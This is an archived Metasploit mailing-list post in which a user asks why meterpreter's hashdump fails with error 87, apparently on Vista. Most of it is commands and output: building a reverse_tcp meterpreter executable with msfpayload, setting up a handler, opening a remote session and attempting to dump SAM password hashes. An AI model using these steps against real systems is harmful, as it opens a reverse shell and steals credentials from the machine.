priv_passwd_get_sam_hashes: Operation failed: 87

[wfdawson at bellsouth.net (wfdawson at bellsouth.net)]

Hi all,

I saw an older thread on this topic, but I don't see this as necessarily being directly related to that one.  First, I 
created a .exe:


./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.11.247 LPORT=443 X > rv_443.exe

Then, I started msfconsole to receive the connection, and attempted to get the hashdump, with the resulting error:

...
       =[ msf v3.3-dev
+ -- --=[ 351 exploits - 223 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 128 aux

resource> use exploit/multi/handler
resource> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource> set LHOST 172.16.11.247
LHOST => 172.16.11.247
resource> set LPORT 443
LPORT => 443
resource> exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (172.16.11.247:443 -> 67.83.150.162:50496)

meterpreter > sysinfo
Computer: ...........
OS      : Windows 2000 (Build 6001, Service Pack 1).
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: 87
meterpreter > exit

Is this result typical of Vista?

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090301/ebcb3db2/attachment.htm>